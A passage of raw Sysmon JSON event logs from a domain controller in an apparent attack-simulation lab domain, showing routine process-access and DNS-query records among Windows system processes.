C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:47:09.765","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:47:10","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:09","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2428,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:47:09.765\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 664\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-01DD-5F25-0000-0010D9560400}\r\nTargetProcessId: 4116\r\nTargetImage: C:\\Windows\\system32\\conhost.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\SYSTEM32\\CSRSRV.dll+1a30|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5c09|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:47:09.765","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"664","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-01DD-5F25-0000-0010D9560400}","TargetProcessId":"4116","TargetImage":"C:\\Windows\\system32\\conhost.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\SYSTEM32\\CSRSRV.dll+1a30|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5c09|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:47:10","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:09","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2429,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:47:09.765\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010FACE0000}\r\nSourceProcessId: 1332\r\nSourceThreadId: 1032\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01DD-5F25-0000-001018530400}\r\nTargetProcessId: 3384\r\nTargetImage: C:\\Windows\\system32\\WinrsHost.exe\r\nGrantedAccess: 0x40\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\winrscmd.dll+8d36|C:\\Windows\\system32\\winrscmd.dll+92d5|C:\\Windows\\system32\\winrscmd.dll+af31|C:\\Windows\\system32\\winrscmd.dll+23dc|c:\\windows\\system32\\wsmsvc.dll+155ac7|c:\\windows\\system32\\wsmsvc.dll+13f76d|c:\\windows\\system32\\wsmsvc.dll+13f3cf|c:\\windows\\system32\\wsmsvc.dll+13fcb2|c:\\windows\\system32\\wsmsvc.dll+9ab10|c:\\windows\\system32\\wsmsvc.dll+9b611|c:\\windows\\system32\\wsmsvc.dll+4495|c:\\windows\\system32\\wsmsvc.dll+16816c|c:\\windows\\system32\\wsmsvc.dll+1689b8|c:\\windows\\system32\\wsmsvc.dll+16345b|c:\\windows\\system32\\wsmsvc.dll+163125|c:\\windows\\system32\\wsmsvc.dll+14ce9c|c:\\windows\\system32\\wsmsvc.dll+130049|c:\\windows\\system32\\wsmsvc.dll+13571a|c:\\windows\\system32\\wsmsvc.dll+12f47e|c:\\windows\\system32\\wsmsvc.dll+125587|c:\\windows\\system32\\wsmsvc.dll+11f562|c:\\windows\\system32\\wsmsvc.dll+124574","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:47:09.765","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010FACE0000}","SourceProcessId":"1332","SourceThreadId":"1032","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01DD-5F25-0000-001018530400}","TargetProcessId":"3384","TargetImage":"C:\\Windows\\system32\\WinrsHost.exe","GrantedAccess":"0x40","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\winrscmd.dll+8d36|C:\\Windows\\system32\\winrscmd.dll+92d5|C:\\Windows\\system32\\winrscmd.dll+af31|C:\\Windows\\system32\\winrscmd.dll+23dc|c:\\windows\\system32\\wsmsvc.dll+155ac7|c:\\windows\\system32\\wsmsvc.dll+13f76d|c:\\windows\\system32\\wsmsvc.dll+13f3cf|c:\\windows\\system32\\wsmsvc.dll+13fcb2|c:\\windows\\system32\\wsmsvc.dll+9ab10|c:\\windows\\system32\\wsmsvc.dll+9b611|c:\\windows\\system32\\wsmsvc.dll+4495|c:\\windows\\system32\\wsmsvc.dll+16816c|c:\\windows\\system32\\wsmsvc.dll+1689b8|c:\\windows\\system32\\wsmsvc.dll+16345b|c:\\windows\\system32\\wsmsvc.dll+163125|c:\\windows\\system32\\wsmsvc.dll+14ce9c|c:\\windows\\system32\\wsmsvc.dll+130049|c:\\windows\\system32\\wsmsvc.dll+13571a|c:\\windows\\system32\\wsmsvc.dll+12f47e|c:\\windows\\system32\\wsmsvc.dll+125587|c:\\windows\\system32\\wsmsvc.dll+11f562|c:\\windows\\system32\\wsmsvc.dll+124574","EventReceivedTime":"2020-08-01 05:47:10","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:09","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":22,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":22,"OpcodeValue":0,"RecordNumber":2430,"ProcessID":2740,"ThreadID":3432,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Dns query:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:47:09.176\r\nProcessGuid: {A837DB8D-01B3-5F25-0000-001001540000}\r\nProcessId: 864\r\nQueryName: WIN-DC-881393\r\nQueryStatus: 0\r\nQueryResults: fe80::3413:3332:6143:4f60;::ffff:10.0.1.14;\r\nImage: C:\\Windows\\System32\\lsass.exe","Category":"Dns query (rule: DnsQuery)","Opcode":"Info","UtcTime":"2020-08-01 05:47:09.176","ProcessGuid":"{A837DB8D-01B3-5F25-0000-001001540000}","QueryName":"WIN-DC-881393","QueryStatus":"0","QueryResults":"fe80::3413:3332:6143:4f60;::ffff:10.0.1.14;","Image":"C:\\Windows\\System32\\lsass.exe","EventReceivedTime":"2020-08-01 05:47:10","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:09","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":22,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":22,"OpcodeValue":0,"RecordNumber":2431,"ProcessID":2740,"ThreadID":3432,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Dns query:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:47:09.177\r\nProcessGuid: {A837DB8D-01C5-5F25-0000-001014BB0200}\r\nProcessId: 2688\r\nQueryName: win-dc-881393.attackrange.local\r\nQueryStatus: 0\r\nQueryResults: fe80::3413:3332:6143:4f60;::ffff:10.0.1.14;\r\nImage: C:\\Windows\\System32\\dns.exe","Category":"Dns query (rule: DnsQuery)","Opcode":"Info","UtcTime":"2020-08-01 05:47:09.177","ProcessGuid":"{A837DB8D-01C5-5F25-0000-001014BB0200}","QueryName":"win-dc-881393.attackrange.local","QueryStatus":"0","QueryResults":"fe80::3413:3332:6143:4f60;::ffff:10.0.1.14;","Image":"C:\\Windows\\System32\\dns.exe","EventReceivedTime":"2020-08-01 05:47:10","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:09","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":22,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":22,"OpcodeValue":0,"RecordNumber":2432,"ProcessID":2740,"ThreadID":3432,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Dns query:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:47:09.635\r\nProcessGuid: {A837DB8D-01B3-5F25-0000-001001540000}\r\nProcessId: 864\r\nQueryName: _ldap._tcp.Default-First-Site-Name._sites.attackrange.local.\r\nQueryStatus: 9502\r\nQueryResults: \r\nImage: C:\\Windows\\System32\\lsass.exe","Category":"Dns query (rule: DnsQuery)","Opcode":"Info","UtcTime":"2020-08-01 05:47:09.635","ProcessGuid":"{A837DB8D-01B3-5F25-0000-001001540000}","QueryName":"_ldap._tcp.Default-First-Site-Name._sites.attackrange.local.","QueryStatus":"9502","Image":"C:\\Windows\\System32\\lsass.exe","EventReceivedTime":"2020-08-01 05:47:10","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:09","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":22,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":22,"OpcodeValue":0,"RecordNumber":2433,"ProcessID":2740,"ThreadID":3432,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Dns query:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:47:09.649\r\nProcessGuid: {A837DB8D-01B3-5F25-0000-001001540000}\r\nProcessId: 864\r\nQueryName: attackrange.local.\r\nQueryStatus: 9502\r\nQueryResults: \r\nImage: C:\\Windows\\System32\\lsass.exe","Category":"Dns query (rule: DnsQuery)","Opcode":"Info","UtcTime":"2020-08-01 05:47:09.649","ProcessGuid":"{A837DB8D-01B3-5F25-0000-001001540000}","QueryName":"attackrange.local.","QueryStatus":"9502","Image":"C:\\Windows\\System32\\lsass.exe","EventReceivedTime":"2020-08-01 05:47:10","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:09","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2434,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:47:09.781\r\nSourceProcessGUID: {A837DB8D-01DD-5F25-0000-0010D9560400}\r\nSourceProcessId: 4116\r\nSourceThreadId: 4136\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {A837DB8D-01DD-5F25-0000-00102C560400}\r\nTargetProcessId: 4104\r\nTargetImage: C:\\Windows\\system32\\WinrsHost.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:47:09.781","SourceProcessGUID":"{A837DB8D-01DD-5F25-0000-0010D9560400}","SourceProcessId":"4116","SourceThreadId":"4136","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{A837DB8D-01DD-5F25-0000-00102C560400}","TargetProcessId":"4104","TargetImage":"C:\\Windows\\system32\\WinrsHost.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:47:10","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:09","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2435,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:47:09.781\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01DD-5F25-0000-00102C560400}\r\nTargetProcessId: 4104\r\nTargetImage: C:\\Windows\\system32\\WinrsHost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:47:09.781","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01DD-5F25-0000-00102C560400}","TargetProcessId":"4104","TargetImage":"C:\\Windows\\system32\\WinrsHost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:47:10","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:09","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2436,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:47:09.797\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010FACE0000}\r\nSourceProcessId: 1332\r\nSourceThreadId: 1468\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01DD-5F25-0000-00102C560400}\r\nTargetProcessId: 4104\r\nTargetImage: C:\\Windows\\system32\\WinrsHost.exe\r\nGrantedAccess: 0x40\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\winrscmd.dll+8d36|C:\\Windows\\system32\\winrscmd.dll+92d5|C:\\Windows\\system32\\winrscmd.dll+af31|C:\\Windows\\system32\\winrscmd.dll+23dc|c:\\windows\\system32\\wsmsvc.dll+155ac7|c:\\windows\\system32\\wsmsvc.dll+13f76d|c:\\windows\\system32\\wsmsvc.dll+13f3cf|c:\\windows\\system32\\wsmsvc.dll+13fcb2|c:\\windows\\system32\\wsmsvc.dll+9ab10|c:\\windows\\system32\\wsmsvc.dll+9b611|c:\\windows\\system32\\wsmsvc.dll+4495|c:\\windows\\system32\\wsmsvc.dll+16816c|c:\\windows\\system32\\wsmsvc.dll+1689b8|c:\\windows\\system32\\wsmsvc.dll+16345b|c:\\windows\\system32\\wsmsvc.dll+163125|c:\\windows\\system32\\wsmsvc.dll+14ce9c|c:\\windows\\system32\\wsmsvc.dll+130049|c:\\windows\\system32\\wsmsvc.dll+13571a|c:\\windows\\system32\\wsmsvc.dll+12f47e|c:\\windows\\system32\\wsmsvc.dll+125587|c:\\windows\\system32\\wsmsvc.dll+11f562|c:\\windows\\system32\\wsmsvc.dll+124574","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:47:09.797","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010FACE0000}","SourceProcessId":"1332","SourceThreadId":"1468","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01DD-5F25-0000-00102C560400}","TargetProcessId":"4104","TargetImage":"C:\\Windows\\system32\\WinrsHost.exe","GrantedAccess":"0x40","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\winrscmd.dll+8d36|C:\\Windows\\system32\\winrscmd.dll+92d5|C:\\Windows\\system32\\winrscmd.dll+af31|C:\\Windows\\system32\\winrscmd.dll+23dc|c:\\windows\\system32\\wsmsvc.dll+155ac7|c:\\windows\\system32\\wsmsvc.dll+13f76d|c:\\windows\\system32\\wsmsvc.dll+13f3cf|c:\\windows\\system32\\wsmsvc.dll+13fcb2|c:\\windows\\system32\\wsmsvc.dll+9ab10|c:\\windows\\system32\\wsmsvc.dll+9b611|c:\\windows\\system32\\wsmsvc.dll+4495|c:\\windows\\system32\\wsmsvc.dll+16816c|c:\\windows\\system32\\wsmsvc.dll+1689b8|c:\\windows\\system32\\wsmsvc.dll+16345b|c:\\windows\\system32\\wsmsvc.dll+163125|c:\\windows\\system32\\wsmsvc.dll+14ce9c|c:\\windows\\system32\\wsmsvc.dll+130049|c:\\windows\\system32\\wsmsvc.dll+13571a|c:\\windows\\system32\\wsmsvc.dll+12f47e|c:\\windows\\system32\\wsmsvc.dll+125587|c:\\windows\\system32\\wsmsvc.dll+11f562|c:\\windows\\system32\\wsmsvc.dll+124574","EventReceivedTime":"2020-08-01 05:47:10","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:09","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2437,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:47:09.812\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-001001540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 992\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {A837DB8D-01B5-5F25-0000-0010FACE0000}\r\nTargetProcessId: 1332\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+1b05d|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:47:09.812","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-001001540000}","SourceProcessId":"864","SourceThreadId":"992","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{A837DB8D-01B5-5F25-0000-0010FACE0000}","TargetProcessId":"1332","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+1b05d|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:47:10","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:09","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2438,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:47:09.812\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-001001540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 992\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {A837DB8D-01B5-5F25-0000-0010FACE0000}\r\nTargetProcessId: 1332\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: 